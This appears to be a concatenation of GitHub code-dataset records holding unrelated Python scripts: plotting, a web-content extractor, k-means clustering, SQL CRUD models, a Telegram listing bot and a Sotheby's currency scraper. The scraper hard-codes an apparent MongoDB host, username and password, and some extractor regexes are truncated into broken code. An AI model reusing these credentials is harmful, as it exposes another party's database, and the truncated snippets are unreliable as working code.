# a damped sine wave\r\n y = (np.sin(2*np.pi*x))*(np.exp(-x))\r\n\r\n return(x, y)\r\n\r\n\r\ndef plot_subplot2grid():\r\n\t# setting a style to use\r\n\tplt.style.use('ggplot')\r\n\r\n\t# defining subplots and their positions\r\n\tplt1 = plt.subplot2grid((11, 1), (0, 0), rowspan=3, colspan=1)\r\n\tplt2 = plt.subplot2grid((11, 1), (4, 0), rowspan=3, colspan=1)\r\n\tplt3 = plt.subplot2grid((11, 1), (8, 0), rowspan=3, colspan=1)\r\n\r\n\t# plotting points on each subplot\r\n\tx, y = create_plot('sin')\r\n\tplt1.plot(x, y, label='sine wave', color='b')\r\n\tx, y = create_plot('exp')\r\n\tplt2.plot(x, y, label='negative exponential', color='r')\r\n\tx, y = create_plot('hybrid')\r\n\tplt3.plot(x, y, label='damped sine wave', color='g')\r\n\r\n\t# show legends of each subplot\r\n\tplt1.legend()\r\n\tplt2.legend()\r\n\tplt3.legend()\r\n\r\ndef plot_3dimen():\r\n\t# setting a custom style to use\r\n\tstyle.use('ggplot')\r\n\r\n\t# create a new figure for plotting\r\n\tfig = plt.figure()\r\n\r\n\t# create a new subplot on our figure\r\n\t# and set projection as 3d\r\n\tax1 = fig.add_subplot(221, projection='3d')\r\n\tax2 = fig.add_subplot(222, projection='3d')\r\n\tax3 = fig.add_subplot(223, projection='3d')\r\n\tax4 = fig.add_subplot(224, projection='3d')\r\n\r\n\t# defining x, y, z co-ordinates\r\n\tx = np.random.randint(0, 10, size=20)\r\n\ty = np.random.randint(0, 10, size=20)\r\n\tz = np.random.randint(0, 10, size=20)\r\n\r\n\t# plotting the points on subplot\r\n\tax1.scatter(x, y, z, c='m', marker='o')\r\n\t# ax2.plot_wireframe(x,y,z)\r\n\r\n\t# defining x, y, z co-ordinates for bar position\r\n\tx = [1,2,3,4,5,6,7,8,9,10]\r\n\ty = [4,3,1,6,5,3,7,5,3,7]\r\n\tz = np.zeros(10)\r\n\t# size of bars\r\n\tdx = np.ones(10) # length along x-axis\r\n\tdy = np.ones(10) # length along y-axs\r\n\tdz = [1,3,4,2,6,7,5,5,10,9] # height of bar\r\n\t# setting color scheme\r\n\tcolor = []\r\n\tfor h in dz:\r\n\t\tif h > 5:\r\n\t\t\tcolor.append('r')\r\n\t\telse:\r\n\t\t\tcolor.append('b')\r\n\t# plotting the bars\r\n\tax3.bar3d(x, y, z, dx, dy, dz, color=color)\r\n\r\n\t# get points for a mesh grid\r\n\tu, v = np.mgrid[0:2*np.pi:200j, 0:np.pi:100j]\r\n\t# setting x, y, z co-ordinates\r\n\tx=np.cos(u)*np.sin(v)\r\n\ty=np.sin(u)*np.sin(v)\r\n\tz=np.cos(v)\r\n\tax4.plot_wireframe(x, y, z, rstride = 5, cstride = 5, linewidth = 1) \r\n\r\n\t# setting labels for the axes\r\n\tax1.set_xlabel('x-axis', fontsize=20)\r\n\tax1.set_ylabel('y-axis')\r\n\tax1.set_zlabel('z-axis')\r\n\r\ndef plot_log():\r\n\t\"\"\"\r\n\tnonposx='clip', nonposy='clip'\r\n\t\"\"\"\r\n\tt = [i for i in range(100)]\r\n\tx = [2**i for i in range(100)]\r\n\ty = [10**i for i in range(100)]\r\n\r\n\tfig = plt.figure()\r\n\tplt1 = fig.add_subplot(221)\r\n\tplt2 = fig.add_subplot(222)\r\n\tplt3 = fig.add_subplot(223)\r\n\tplt4 = fig.add_subplot(224)\r\n\r\n\tplt1.loglog(x, y, marker='.', base=2, basey=10)\r\n\t# plt2.semilogx(base=2)\r\n\t# plt2.semilogy(base=10)\r\n\tplt.plot(t, y, marker='.')\r\n\tplt.yscale('log')\r\n\r\n\r\nif(__name__ == \"__main__\"):\r\n\tf_plot_1()\r\n\tplt.show()\r\n","repo_name":"linjw16/utilities","sub_path":"py/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"861677541","text":"\"\"\" The module provides utility functions such as finding all the files with specified flag (i.e., py files) and checking python extensions. \"\"\"\n\nimport ast\nimport builtins\nimport operator\nimport sys \nimport os\n\n\n# scan a folder recurisively and return all files ending with the flag\ndef get_path_by_ext(root_dir, flag=\".py\"):\n paths = []\n for root, dirs, files in os.walk(root_dir):\n files = [\n f for f in files if not f[0] == \".\"\n ] # skip hidden files such as git files\n dirs[:] = [d for d in dirs if not d[0] == \".\"]\n for f in files:\n if f.endswith(flag):\n paths.append(os.path.join(root, f))\n return paths\n\ndef check_python_version():\n \"\"\"check Python version\"\"\"\n # Check for known bad Python versions.\n if sys.version_info[:2] < (3, 8):\n sys.exit(\"Running Scalpel with Python 3.8 or lower is not supported; \")\n\n","repo_name":"SMAT-Lab/Scalpel","sub_path":"src/scalpel/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":242,"dataset":"github-code","pt":"32"} +{"seq_id":"15883907399","text":"import logging\nimport re\nimport json\nimport cgi\nimport datetime\nimport urllib\nimport urllib2\nimport webapp2\nimport jinja2\nimport os\n\nclass ExtractionService():\n\tdef get_size(this, url):\n\t\tlogging.info(\"get_size\")\n\t\tlogging.info(\"get_size\" + str(url))\n\t\tfil = urllib2.urlopen(url)\n\t\tbits = fil.read()\n\t\tsize = len(bits)\n\t\tfil.close()\n\t\treturn size\t\n\n\tdef extract_content(this, url):\n\t\tobj = {}\n\t\ttry:\n\t\t\tf = urllib2.urlopen(url)\n\t\t\thtml_text = f.read()\n\t\t\tlogging.info(html_text)\n\t\t\tf.close()\n\n\t\t\ttry:\n\t\t\t\ttitle = this.extract_title(html_text)\n\t\t\t\tobj['title'] = title\n\t\t\texcept:\n\t\t\t\tobj['title'] = \"false\"\n\n\t\t\ttry:\n\t\t\t\tmain_content = this.extract_main_content(html_text)\n\t\t\t\tobj['main_content'] = main_content\n\t\t\texcept:\n\t\t\t\tobj['main_content'] = \"false\"\n\n\t\t\ttry:\n\t\t\t\timage = this.extract_images(html_text)\n\t\t\t\tobj['image'] = image\n\t\t\texcept:\n\t\t\t\tobj['image'] = \"false\"\n\n\t\t\ttry:\n\t\t\t\tpublisher = this.extract_publisher(url)\n\t\t\t\tobj['publisher'] = publisher\n\t\t\t\tlogging.info(\"FIRST LETTER \" + str(obj['image'][0]))\n\t\t\t\tlogging.info(str(obj['image']))\n\t\t\t\tif obj['image'][0] == \"/\":\n\t\t\t\t\tlogging.info(\"Found the /\")\n\t\t\t\t\tobj['image'] = publisher + obj['image']\n\t\t\t\t\tlogging.info(obj['image'])\n\t\t\texcept:\n\t\t\t\tobj['image'] = \"false\"\n\n\t\t\treturn obj\n\t\t\n\t\texcept:\n\t\t\tobj['title'] = \"false\"\n\t\t\tobj['publisher'] = \"false\"\n\t\t\tobj['main_content'] = \"false\"\n\t\t\tobj['image'] = \"false\"\n\t\t\treturn obj\n\n\tdef extract_main_content(this, html_text):\n\t\ttest_string = r\"<.*?>(.*?)<.*?>\"\n\t\tp = re.compile(test_string, re.IGNORECASE)\n\t\tcontent_list = p.findall(str(html_text))\n\n\t\ttest_string2 = r\"(\\s)\"\n\t\tq = re.compile(test_string2, re.IGNORECASE)\n\n\t\tmain_cont = \"\"\n\n\t\tif len(content_list) > 0:\n\t\t\tcnt = 0\n\t\t\tlogging.info(len(content_list))\n\t\t\tfor content in content_list:\n\t\t\t\tcnt2 = len(content)\n\t\t\t\tif cnt2 > cnt:\n\t\t\t\t\tcontent_list2 = q.findall(str(content))\n\n\t\t\t\t\tlogging.info(str(len(content)) + \" / \" + str(len(content_list2)))\n\t\t\t\t\tif len(content_list2) > 0:\n\t\t\t\t\t\twhitespace_ratio = (len(content) / len(content_list2))\n\t\t\t\t\t\tlogging.info(\"WHITESPACE RATIO \" + str(whitespace_ratio))\n\t\t\t\t\t\tlogging.info(\"LENGTH \" + str(len(content)))\n\t\t\t\t\t\tif whitespace_ratio < 10 and len(content) > 100:\n\t\t\t\t\t\t\tlogging.info(len(content))\n\t\t\t\t\t\t\tlogging.info(content)\n\t\t\t\t\t\t\tmain_cont = content[0:250]\n\t\t\t\t\t\t\tcnt = cnt2\n\n\t\t\tlogging.info(\"MAIN CONTENT \" + str(main_cont))\n\n\t\t\tif len(main_cont) > 99:\n\t\t\t\tlogging.info(main_cont)\n\t\t\t\treturn str(main_cont)\n\t\tif len(main_cont) <= 99:\n\t\t\treturn \"false\"\n\n\tdef extract_title(this, html_text):\n\t\ttry:\n\t\t\ttest_string = r\".*title>\"\n\t\t\tp = re.compile(test_string, re.IGNORECASE)\n\t\t\ttitles_list = p.findall(str(html_text))\n\t\t\tif len(titles_list) > 0:\n\t\t\t\ttitle = titles_list[0].replace(\"<title>\", \"\")\n\t\t\t\ttitle = title.replace(\"\", \"\")\n\t\t\t\tlogging.info(str(title))\n\t\t\t\tstring = title.split('|')\n\t\t\t\ttitle = string[0]\n\t\t\t\treturn title\n\t\texcept:\n\t\t\treturn \"false\"\n\n\tdef force_utf8(this, string):\n\t\tlogging.info(\"got called!\")\n\t\tif type(string) == str:\n\t\t\treturn string\n\t\telse:\n\t\t\treturn string.decode('utf-8')\n\n\tdef extract_publisher(this, url):\n\t\ttry:\n\t\t\ttest_string = r\"http://(.*?)/\"\n\t\t\tp = re.compile(test_string, re.IGNORECASE)\n\t\t\tpublishers_list = p.findall(str(url))\n\t\t\tlogging.info(len(publishers_list))\n\t\t\tif len(publishers_list) > 0:\n\t\t\t\tpublisher = publishers_list[0]\n\t\t\t\tlogging.info(publisher)\n\t\t\t\tlogging.info(type(publisher))\n\t\t\t\tpublisher = this.force_utf8(publisher)\n\t\t\t\tlogging.info(publisher)\n\t\t\t\treturn str(publisher)\n\t\texcept:\n\t\t\tpublisher = \"false\"\n\n\tdef extract_images(this, html_text):\n\t\ttry:\n\t\t\ttest_string = r' 0:\n\t\t\t\tfor title1 in titles_list:\n\t\t\t\t\tlogging.info(title1)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tlogging.info(\"Trying...\")\n\t\t\t\t\t\tsize = this.get_size(title1)\n\t\t\t\t\t\tlogging.info(\"SIZE: \" + str(size))\n\t\t\t\t\t\tif size > largest_image_count:\n\t\t\t\t\t\t\ttitle = title1\n\t\t\t\t\texcept:\n\t\t\t\t\t\tlogging.info(\"SIZE DID NOT WORK\")\n\n\t\t\t\tlogging.info(str(title))\n\t\t\t\treturn title\n\t\texcept:\n\t\t\treturn \"false\"","repo_name":"ncohen/shared-article","sub_path":"extraction_service.py","file_name":"extraction_service.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26371493605","text":"from __future__ import annotations\n\nimport json\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom math import sqrt\nfrom random import uniform\nfrom statistics import mean, pstdev\nimport typing as t \n\n\ndef lambda_handler(event, context):\n print(\"FULL REQUEST: \", event)\n points = [DataPoint(**point) for point in json.loads(event[\"body\"])]\n max_size = 5\n num_points = len(points)\n if num_points % max_size == 0:\n num_clusters = int(num_points / max_size)\n else:\n num_clusters = int(num_points / max_size) + 1\n\n kmeans: KMeans[DataPoint] = KMeans(num_clusters, points, max_size=max_size)\n clusters: t.List[Cluster] = kmeans.run()\n flat_clusters = []\n for idx, c in enumerate(clusters, 1):\n for p in c.points:\n serial_p = p.serialize()\n serial_p[\"cluster\"] = idx\n flat_clusters.append(serial_p)\n print(\"RESPONSE BODY: \", flat_clusters)\n return {\n \"statusCode\": \"200\",\n \"body\": json.dumps(flat_clusters),\n \"headers\": {\n \"Content-Type\": \"application/json\",\n },\n }\n\n\ndef zscores(original: t.Sequence[float]) -> t.List[float]:\n avg: float = mean(original)\n std: float = pstdev(original)\n if std == 0: # return all zeros if there is no variation\n return [0] * len(original)\n return [(x - avg) / std for x in original]\n\n\nclass DataPoint:\n def __init__(self, coords: t.Iterable[float], _id: t.Any = None, extra_data: t.Optional[t.Dict] = None) -> None:\n self._id: t.Any = _id\n self._originals: t.Tuple[float, ...] = tuple(coords)\n self.dimensions: t.Tuple[float, ...] = tuple(coords)\n\n @property\n def num_dimensions(self) -> int:\n return len(self.dimensions)\n\n def distance(self, other: DataPoint) -> float:\n combined: t.Iterator[t.Tuple[float, float]] = zip(self.dimensions, other.dimensions)\n differences: t.List[float] = [(x - y) ** 2 for x, y in combined]\n return sqrt(sum(differences))\n\n def serialize(self) -> t.Dict:\n serialized: t.Dict = {\n \"coords\": self._originals,\n }\n if self._id is not None:\n serialized[\"_id\"] = self._id\n return serialized\n\n def __eq__(self, other: object) -> bool:\n if not isinstance(other, DataPoint):\n return NotImplemented\n return self.dimensions == other.dimensions\n\n def __repr__(self) -> str:\n return self._originals.__repr__()\n\n\nPoint = t.TypeVar(\"Point\", bound=DataPoint)\n\n\n@dataclass\nclass Cluster:\n points: t.List[Point]\n centroid: DataPoint\n max_size: int\n\n @property\n def is_full(self) -> bool:\n return len(self.points) >= self.max_size\n\n\nclass KMeans(t.Generic[Point]):\n def __init__(self, k: int, points: t.List[Point], max_size=float(\"inf\")) -> None:\n if k < 1: # k-means can't do negative or zero clusters\n raise ValueError(\"k must be >= 1\")\n self._points: t.List[Point] = points\n self._zscore_normalize()\n # initialize empty clusters with random centroids\n self._clusters: t.List[Cluster] = []\n for _ in range(k):\n rand_point: DataPoint = self._random_point()\n cluster: Cluster = Cluster([], rand_point, max_size)\n self._clusters.append(cluster)\n\n @property\n def _centroids(self) -> t.List[DataPoint]:\n return [x.centroid for x in self._clusters]\n\n def _dimension_slice(self, dimension: int) -> t.List[float]:\n return [x.dimensions[dimension] for x in self._points]\n\n def _zscore_normalize(self) -> None:\n zscored: t.List[t.List[float]] = [[] for _ in range(len(self._points))]\n for dimension in range(self._points[0].num_dimensions):\n dimension_slice: t.List[float] = self._dimension_slice(dimension)\n for index, zscore in enumerate(zscores(dimension_slice)):\n zscored[index].append(zscore)\n for i in range(len(self._points)):\n self._points[i].dimensions = tuple(zscored[i])\n\n def _random_point(self) -> DataPoint:\n rand_dimensions: t.List[float] = []\n for dimension in range(self._points[0].num_dimensions):\n values: t.List[float] = self._dimension_slice(dimension)\n rand_value: float = uniform(min(values), max(values))\n rand_dimensions.append(rand_value)\n return DataPoint(rand_dimensions)\n\n # Find the closest cluster centroid to each point and assign the point to that cluster\n def _assign_clusters(self) -> None:\n # [distance to nearest centroid, DataPoint, list of centroids ordered by nearness]\n points_with_nearness: t.List[t.Tuple[float, DataPoint, t.List[DataPoint]]] = []\n for point in self._points:\n centroids_and_distance: t.List[t.Tuple[float, DataPoint]] = [\n (point.distance(cen), cen) for cen in self._centroids\n ]\n # sort centroids in order of nearness\n centroids_and_distance.sort(key=lambda x: x[0])\n points_with_nearness.append(\n # tuple of distance to nearest centroid and centroids ordered by distance\n (\n centroids_and_distance[0][0],\n point,\n [x[1] for x in centroids_and_distance],\n )\n )\n # order by points nearest to centroids\n points_with_nearness.sort(key=lambda x: x[0])\n for _, point, centroids in points_with_nearness:\n for cen in centroids:\n idx: int = self._centroids.index(cen)\n cluster: Cluster = self._clusters[idx]\n if not cluster.is_full:\n cluster.points.append(point)\n break\n\n # Find the center of each cluster and move the centroid to there\n def _generate_centroids(self) -> None:\n for cluster in self._clusters:\n if len(cluster.points) == 0: # keep the same centroid if no points\n continue\n means: t.List[float] = []\n for dimension in range(cluster.points[0].num_dimensions):\n dimension_slice: t.List[float] = [\n p.dimensions[dimension] for p in cluster.points\n ]\n means.append(mean(dimension_slice))\n cluster.centroid = DataPoint(means)\n\n def run(self, max_iterations: int = 100) -> t.List[Cluster]:\n for iteration in range(max_iterations):\n for cluster in self._clusters: # clear all clusters\n cluster.points.clear()\n self._assign_clusters() # find cluster each point is closest to\n old_centroids: t.List[DataPoint] = deepcopy(self._centroids) # record\n self._generate_centroids() # find new centroids\n if old_centroids == self._centroids: # have centroids moved?\n print(f\"Converged after {iteration} iterations\")\n return self._clusters\n return self._clusters\n\n\nif __name__ == \"__main__\":\n from random import random\n\n points = [\n DataPoint([round(random() * 20, 1), round(random() * 20, 1)]) for i in range(20)\n ]\n\n # points = [\n # DataPoint([0.0, 0.0]),\n # DataPoint([1.0, 1.0]),\n # DataPoint([2.0, 2.0]),\n # DataPoint([3.0, 3.0]),\n # DataPoint([4.0, 4.0]),\n # DataPoint([5.0, 5.0]),\n # DataPoint([6.0, 6.0]),\n # DataPoint([7.0, 7.0]),\n # DataPoint([8.0, 8.0]),\n # DataPoint([9.0, 9.0]),\n # ]\n kmeans_test: KMeans[DataPoint] = KMeans(4, points, max_size=5)\n test_clusters: t.List[Cluster] = kmeans_test.run()\n for index, cluster in enumerate(test_clusters):\n # print(f\"Cluster {index}\")\n print()\n for p in cluster.points:\n print(f\"{p._originals[0]} {p._originals[1]} \", end=\"\")\n print()","repo_name":"ward4mutualaid-data/w4madata","sub_path":"lambda/clusters.py","file_name":"clusters.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36157361398","text":"class Estudiante(object):\n\n db = None\n\n#Crear estudiante\n @classmethod\n def create(cls, apellido, nombre, fecha_nac, localidad_id, nivel_id, domicilio, genero_id, escuela_id, tipo_doc_id, numero, tel, barrio_id, lugar_nac, responsable):\n sql = \"\"\"\n INSERT INTO `estudiante`(`apellido`, `nombre`, `fecha_nac`, `localidad_id`, `nivel_id`, `domicilio`, `genero_id`, `escuela_id`, `tipo_doc_id`, `numero`, `tel`, `barrio_id`, `lugar_nac`, `responsable`) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n cursor = cls.db.cursor()\n cursor.execute(sql,(apellido, nombre, fecha_nac, localidad_id, nivel_id, domicilio, genero_id, escuela_id, tipo_doc_id, numero, tel, barrio_id, lugar_nac, responsable) )\n cls.db.commit()\n return True \n\n#Buscar en estudiante\n @classmethod\n def all(cls):\n sql = 'SELECT * FROM estudiante'\n cursor = cls.db.cursor()\n cursor.execute(sql)\n return cursor.fetchall()\n\n @classmethod\n def apiEstudiantes(cls):\n sql = 'SELECT id, nombre, apellido FROM estudiante'\n cursor = cls.db.cursor()\n cursor.execute(sql)\n return cursor.fetchall()\n\n @classmethod\n def buscarId(cls, idE):\n sql = \"\"\"\n SELECT * FROM estudiante AS e\n WHERE e.id=%s\n \"\"\"\n cursor = cls.db.cursor()\n cursor.execute(sql, (idE))\n return cursor.fetchone()\n\n#Modificar estudiante\n @classmethod\n def modificar(cls, idE, apellido, nombre, fecha_nac, localidad_id, nivel_id, domicilio, genero_id, escuela_id, tipo_doc_id, numero, tel, barrio_id, lugar_nac, responsable):\n sql = \"\"\"\n UPDATE `estudiante` \n SET `apellido`= %s, `nombre`= %s, `fecha_nac`= %s, `localidad_id`= %s, \n `nivel_id`= %s, `domicilio`= %s, `genero_id`= %s, `escuela_id`= %s,\n `tipo_doc_id`= %s ,`numero`= %s ,`tel`= %s ,`barrio_id`= %s, `lugar_nac`= %s, `responsable`= %s \n WHERE id = %s\n \"\"\"\n cursor = cls.db.cursor()\n cursor.execute(sql,(apellido, nombre, fecha_nac, localidad_id, nivel_id, domicilio, genero_id, escuela_id, tipo_doc_id, numero, tel, barrio_id, lugar_nac, responsable, idE))\n cls.db.commit()\n return True\n\n#borrar estudiante\n @classmethod\n def borrarEstudiante(cls,idU):\n sql = \"\"\" DELETE FROM `estudiante` WHERE `id`=%s\n \"\"\"\n cursor=cls.db.cursor()\n cursor.execute(sql,(idU))\n cls.db.commit()\n return cursor.fetchall()\n\n @classmethod\n def borrarDeTalleres(cls,idEstudiante):\n sql = \"\"\"DELETE FROM `estudiante_taller` WHERE estudiante_id = %s \"\"\"\n cursor=cls.db.cursor()\n cursor.execute(sql,(idEstudiante))\n cls.db.commit()\n return cursor.fetchall()","repo_name":"GuilleGitH/oeb-orquestaescueladeberisso","sub_path":"flaskps/models/estudiante.py","file_name":"estudiante.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1934148436","text":"import pathlib\nimport traceback\n\nimport logging\nimport argparse\n\nfrom src import consts\nfrom src import predicates\nfrom src import query_predicates\nfrom src.telegram_bot import TelegramBot\nfrom src.yad2_scanner import Yad2Scanner\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--chrome-driver\", help=\"path to chromedriver\", required=True, type=str)\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n try:\n logging.basicConfig(filename=consts.PROJECT_DIR / \"yad2.log\",\n filemode=\"w\",\n format=\"%(asctime)s %(levelname)-8s %(message)s\",\n level=logging.INFO,\n datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n try:\n with open(consts.SECRETS_DIR / \"bot_token.secret\") as token_fd:\n token = token_fd.read().strip()\n except IOError:\n logging.critical(\"Couldn't read the bot's token\")\n exit(1)\n\n scanner = Yad2Scanner(consts.ELECTRIC_GUITARS_URL,\n chromedriver_path=args.chrome_driver,\n predicates=[predicates.contains_tokens(consts.FENDER_TOKENS)],\n query_predicates=[query_predicates.price_range(4000, 7000)])\n bot = TelegramBot(token, scanner)\n bot.serve()\n\n except Exception as e:\n logging.critical(e)\n logging.critical(traceback.format_exc())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"aBraM-aBraM/yad2","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42253256472","text":"import requests\nimport json\nimport pymongo\n\ndef getJson(url,date):\n data=requests.get(url).content\n print(data)\n var={}\n var[date]=json.loads(data)['rates']\n dbclient = pymongo.MongoClient(\"45.55.232.5:27017\")\n dbclient.artists.authenticate(\"artSales\", \"Jl@B$!@#\", mechanism='MONGODB-CR')\n db=dbclient.artists\n data=db.datelib\n data.insert(var)\n###CONSTRUCTING DATE###################\nyear=1990\nwhile (year<=2016):\n month=1\n while(month<=12):\n if(month in [1,3,5,7,8,10,12]):\n dayLimit=31\n elif(month in [2] and year%4==0):\n dayLimit=29\n elif(month in [2]):\n dayLimit=28\n else:\n dayLimit=30\n day=1\n while(day<=dayLimit):\n date=str(month) + \"-\" + str(day) + \"-\" + str(year) \n print(\"Date: \" + date)\n url='http://www.sothebys.com/en/auctions/list/_jcr_content.currencyRates.json/'+str(date)\n print(url)\n getJson(url,date)\n day+=1\n month+=1\n year+=1\n \n","repo_name":"jtngrg1992/artscrape","sub_path":"createDates.py","file_name":"createDates.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27168201843","text":"from universal import UniversalDS, ChrData\nfrom topologicalFeatures import *\n\ntempl = {\n \"outputPath\": \"./transformedData/CliqueSegmentStateCountNew/\",\n \"minIntersection\": 0.2,\n}\n\nblood_data = {\n \"dataSet\": \"BloodCellPCHi-C\",\n \"dataPath\": \"./transformedData/BloodCellPCHi-C/Universal/\",\n \"pvalues\": [5],\n \"outputPath\": \"./transformedData/BloodCellPCHi-C/CliqueBaseSegments/\",\n}\n\nnormalHiC_data = {\n \"dataSet\": \"NormalHi-C\",\n \"dataPath\": \"./transformedData/NormalHi-C/Universal/\",\n \"pvalues\": [10],\n \"outputPath\": \"./transformedData/NormalHi-C/CliqueBaseSegments/\",\n}\n\npcHiC_data = {\n \"dataSet\": \"PCHi-C\",\n \"dataPath\": \"./transformedData/PCHi-C/Universal/\",\n \"pvalues\": [0.7],\n \"outputPath\": \"./transformedData/PCHi-C/CliqueBaseSegments/\",\n}\n\ndata_sets = [blood_data, pcHiC_data, normalHiC_data]\n\nfor ds in data_sets:\n for pv in ds[\"pvalues\"]:\n fn = ds[\"dataPath\"] + \"/data-pvalue-\" + str(pv) + \"-fin.json\"\n outputPath = ds[\"outputPath\"]\n U = UniversalDS(fn)\n\n baseNsegments = {}\n bases = [5, 15, 30, 50]\n for base in bases:\n baseNsegments[base] = {}\n\n for ch in U.chrs:\n chData = ChrData(U, ch=ch, minLinkTissueCount=1)\n Bor = Bases(chData)\n Bor.setBasesOr()\n for base in bases:\n baseNsegments[base][ch] = {}\n baseN = Bor.getDegreeNBases(base)\n for tis in baseN:\n segments = set()\n for b in baseN[tis]:\n segments.add(b[0])\n segments.add(b[1])\n baseNsegments[base][ch][tis] = sorted(list(segments))\n with open(outputPath + \"baseN-segments-OR-pvalue-\" + str(pv) + \".json\", \"w\") as outfile:\n json.dump(baseNsegments, outfile)\n","repo_name":"IMCS-Bioinformatics/HiCCliqueGraphs","sub_path":"enrichment/supportCalculation.py","file_name":"supportCalculation.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4736065802","text":"curlocation = list(input())\n\n## 문자를 ascii 숫자로 바꾸려면 ord()를 사용하자 숫자인 문자는 무조건 int\nx=ord(curlocation[0])\ny=int(curlocation[1])\n\nmove_x = [-2, -2, -1, -1, 1, 1, 2, 2]\nmove_y = [-1, 1, 2, -2, 2, -2, 1, -1]\n\ncount =0\n\nfor i in range(8):\n curx= x+move_x[i]\n cury= y+move_y[i]\n if curx<=104 and curx>=97:\n if cury<=8 and cury >=1:\n count+=1\nprint(count)\n\n\n","repo_name":"bfinecpa/python_codingTest","sub_path":"implement/왕실의 나이트.py","file_name":"왕실의 나이트.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8263914723","text":"from elasticsearch import Elasticsearch\n\nes = Elasticsearch([{'host': \"localhost\", 'port': 9200}])\n# create index if it's not in the database\nif not es.indices.exists('rr_products'):\n settings = {\n \"settings\": {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n },\n \"mappings\": {\n \"list\":{\n \"properties\": {\n \"location\": { \"type\": \"geo_point\"},\n }\n }\n }\n }\n # create index\n es.indices.create(index='rr_products', ignore=400, body=settings)\n","repo_name":"shedolkar12/rr","sub_path":"rr/app/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31113258829","text":"try:\r\n def intellihelper(NumberOrCountry,event=None,porr=False):\r\n number = str(NumberOrCountry)\r\n prefix = {\"+1\" : \"USA\",\"+90\" : \"TUR\",\"USA\":\"+1\",\"TUR\":\"+90\"}\r\n for i in prefix:\r\n if number.startswith(str(i)):\r\n if porr==True:\r\n print(prefix.get(i))\r\n else:\r\n return prefix.get(i)\r\nexcept:\r\n print(\"Sory!.Please Try Agian\")\r\nfinally:\r\n a =1","repo_name":"Phoenix-Technology-Company/PNumInfo","sub_path":"PNumInfo/PNumInfo/intellihelper.py","file_name":"intellihelper.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"69987262172","text":"#!/usr/bin/env pytest-3\n# -*- coding: utf-8 -*-\n#\n# This file is part of the minifold project.\n# https://github.com/nokia/minifold\n\nfrom minifold.binary_predicate import BinaryPredicate\nfrom minifold.entries_connector import EntriesConnector\nfrom minifold.query import Query\nfrom minifold.rename import RenameConnector\n\nENTRIES = [\n {\"a\": 1, \"b\": 2, \"c\": 3},\n {\"a\": 10, \"b\": 20, \"c\": 30},\n {\"a\": 100, \"b\": 200, \"c\": 300},\n {\"a\": 100, \"b\": 200, \"d\": 400},\n]\n\nMAP_RENAME = {\n \"a\": \"A\",\n \"c\": \"C\",\n \"d\": \"D\",\n}\n\nRENAME_CONNECTOR = RenameConnector(\n MAP_RENAME,\n EntriesConnector(ENTRIES)\n)\n\n\ndef test_rename_select_where():\n query = Query(\n attributes=[\"A\", \"C\", \"D\"],\n filters=BinaryPredicate(\n BinaryPredicate(\"A\", \"<=\", 100),\n \"&&\",\n BinaryPredicate(\"b\", \">\", 20)\n )\n )\n obtained = RENAME_CONNECTOR.query(query)\n\n assert obtained == [\n {\"A\": 100, \"C\": 300, \"D\": None},\n {\"A\": 100, \"C\": None, \"D\": 400}\n ]\n\n\ndef test_rename_attributes():\n obtained = RENAME_CONNECTOR.attributes(None)\n assert obtained == {\"A\", \"b\", \"C\", \"D\"}\n","repo_name":"nokia/minifold","sub_path":"tests/test_rename.py","file_name":"test_rename.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"9037375706","text":"def inword(word):\n \n know=dict()\n for line in word:\n know[line]\n\n print(know)\n\ndef readfile():\n \n words = open('words.txt')\n new_list=[]\n know=dict()\n for line in words:\n word = line.strip()\n # new_list.append(word)\n know[word]=[word]\n\n print(know)\n\n\n #return new_list\n #print(word\n \n \ndef __main__():\n \n #inword()\n new_list=readfile()\n #inword(new_list)\n__main__()\n","repo_name":"jryan0004/pythonBasicProjects","sub_path":"Exercises 11.1 hashMap.py","file_name":"Exercises 11.1 hashMap.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34928399927","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom rest_framework import generics, status\nfrom rest_framework import filters\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom datetime import datetime\n\nfrom .models import HotelList, ReservationDetails, GuestList\nfrom rest_framework.decorators import api_view\n\n# Create your views here.\nfrom .serializers import HotelSerializer, 